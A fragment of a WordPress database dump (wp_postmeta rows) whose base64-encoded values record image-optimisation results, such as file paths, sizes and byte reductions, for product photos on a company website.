iOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NzAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUwMiwidGltZSI6MTQ4MzU2Mzk5NiwiaWQiOjE3NzR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzcwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1NzMsInRpbWUiOjE0ODM1NjM5OTksImlkIjoxNzc0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc3MC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc3MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc3MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTgyOSwidGltZSI6MTQ4MzU2NDAwMywiaWQiOjE3NzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NzAtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxMCwidGltZSI6MTQ4MzU2NDAwNiwiaWQiOjE3NzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NzAtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU2MCwidGltZSI6MTQ4MzU2NDAwOSwiaWQiOjE3NzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NzAtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjYzMiwidGltZSI6MTQ4MzU2NDAxMywiaWQiOjE3NzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NzAtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk0MSwidGltZSI6MTQ4MzU2NDAxNywiaWQiOjE3NzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NzAtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzcwLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NzAtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozODAsInRpbWUiOjE0ODM1NjQwMjAsImlkIjoxNzc0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29208, 1773, 'wpfc_optimisation_reduction', '27665'); 
INSERT INTO `wp_postmeta` VALUES (29209, 1773, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQwMjUsImlkIjoiMTc3MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzY1LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5NjksInRpbWUiOjE0ODM1NjQwMjgsImlkIjoxNzczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2NS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc2NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzI0NCwidGltZSI6MTQ4MzU2NDAzMSwiaWQiOjE3NzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzY1LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyOTEyLCJ0aW1lIjoxNDgzNTY0MDM1LCJpZCI6MTc3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTM2NTEsInRpbWUiOjE0ODM1NjQwMzksImlkIjoxNzczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2NS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc2NS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjI1LCJ0aW1lIjoxNDgzNTY0MDQyLCJpZCI6MTc3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU0MywidGltZSI6MTQ4MzU2NDA0NSwiaWQiOjE3NzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzY1LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MDAsInRpbWUiOjE0ODM1NjQwNDksImlkIjoxNzczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2NS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc2NS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjAyNSwidGltZSI6MTQ4MzU2NDA1MiwiaWQiOjE3NzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjUtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxMSwidGltZSI6MTQ4MzU2NDA1NSwiaWQiOjE3NzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjUtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU5MCwidGltZSI6MTQ4MzU2NDA1OSwiaWQiOjE3NzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY5MywidGltZSI6MTQ4MzU2NDA2MywiaWQiOjE3NzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjUtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjUtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMTgsInRpbWUiOjE0ODM1NjQwNjYsImlkIjoxNzczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzY1LTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2NS05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzY1LTkweDkwLmpwZyIsInJlZHVjdGlvbiI6Mzg0LCJ0aW1lIjoxNDgzNTY0MDY5LCJpZCI6MTc3M31d'); 
INSERT INTO `wp_postmeta` VALUES (29210, 1772, 'wpfc_optimisation_reduction', '27817'); 
INSERT INTO `wp_postmeta` VALUES (29211, 1772, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjQwNzQsImlkIjoiMTc3MiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzYwLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5ODEsInRpbWUiOjE0ODM1NjQwNzcsImlkIjoxNzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2MC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2MC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc2MC04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MzI3MSwidGltZSI6MTQ4MzU2NDA4MiwiaWQiOjE3NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzYwLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyOTUwLCJ0aW1lIjoxNDgzNTY0MDg1LCJpZCI6MTc3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjAtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTM2ODcsInRpbWUiOjE0ODM1NjQwODksImlkIjoxNzcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2MC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTc2MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTc2MC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjU1LCJ0aW1lIjoxNDgzNTY0MDkyLCJpZCI6MTc3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy03NjAtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy03NjAtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU0OSwidGltZSI6MTQ4MzU2NDA5NSwiaWQiOjE3NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtNzYwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtNzYwLTIyNXgyMjU